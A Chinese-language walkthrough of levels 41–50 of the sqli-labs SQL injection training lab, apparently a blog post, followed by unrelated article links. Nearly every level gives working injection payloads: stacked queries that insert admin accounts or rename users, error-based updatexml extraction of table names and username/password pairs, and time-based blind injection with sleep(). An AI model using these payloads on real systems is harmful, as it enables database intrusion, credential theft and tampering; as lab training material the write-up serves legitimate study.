sqli-libs通关教程(41-50)

第四十一关

数字型注入, 更改用户名

?id=1;update users set username='123456' where username='Dumb'--+

执行后

第四十二关

抓包,尝试添加账号密码

login_user=1&login_password=1';insert into users(id,username,password) values ('42','admin','123456')--+&mysubmit=Login

登录

第四十三关

同上关,闭合修改为 ')

login_user=1&login_password=1'); insert into users(id,username,password) values ('43','root','123456')--+&mysubmit=Login

第四十四关

同四十二关,语句一样

第四十五关

同四十三关,语句一样

第四十六关

参数变了,让我们使用sort参数,1,2,3都是数据库表,只是排序不一样

想要注入的话,使用updatexml进行

?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)

数据

?sort=1 and (updatexml(1,concat(0x5c,(select group_concat(username,'-',password) from users),0x5c),1))

第四十七关

多了一个单引号闭合,可以使用报错注入

?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+

?sort=1' and updatexml(1,concat(0x7e,(select concat(username,':',password) from users limit 0,1)),1)--+

第四十八关

数字型注入,不返回报错信息,使用时间盲注

?sort=1 AND IF(LENGTH(database())=8,sleep(1),1)--+

?sort=1 AND IF(LEFT((SELECT database()), 1)='s',sleep(1),1)--+

?sort=1 AND IF(LEFT((SELECT database()), 8)='security',sleep(1),1)--+

第四十九关

同上关,闭合多一个 '

?sort=1' AND IF(LENGTH(database())=8,sleep(1),1)--+

?sort=1' AND IF(LEFT((SELECT database()), 1)='s',sleep(1),1)--+

?sort=1' AND IF(LEFT((SELECT database()), 8)='security',sleep(1),1)--+

第五十关

同四十六关,不过也能使用堆叠注入

?sort=-1;insert into users(id,username,password) values ('50','abc','123')

执行后,再次sort=1,添加成功

相关推荐
浪裡遊18 小时前
MUI组件库与主题系统全面指南
开发语言·前端·javascript·vue.js·react.js·前端框架·node.js
DiXinWang19 小时前
关闭谷歌浏览器提示“若要接收后续 Google Chrome 更新,您需使用 Windows 10 或更高版本”的方法
前端·chrome
CoderYanger19 小时前
前端基础——HTML练习项目:填写简历信息
前端·css·职场和发展·html
muyouking1119 小时前
深入理解 HTML `<label>` 的 `for` 属性:提升表单可访问性与用户体验
前端·html·ux
IT_陈寒19 小时前
Java性能调优:从GC日志分析到实战优化的5个关键技巧,让你的应用快如闪电!
前端·人工智能·后端
Mintopia19 小时前
🚀 Next.js API 压力测试:一场前端与后端的“极限拉扯”
前端·后端·全栈
Mintopia20 小时前
🛡️ 对抗性攻击与防御:WebAI模型的安全加固技术
前端·javascript·aigc
庙堂龙吟奈我何20 小时前
qiankun知识点
前端
SoaringHeart20 小时前
Flutter封装:原生路由管理极简封装 AppNavigator
前端·flutter
menu20 小时前
AI给我的建议
前端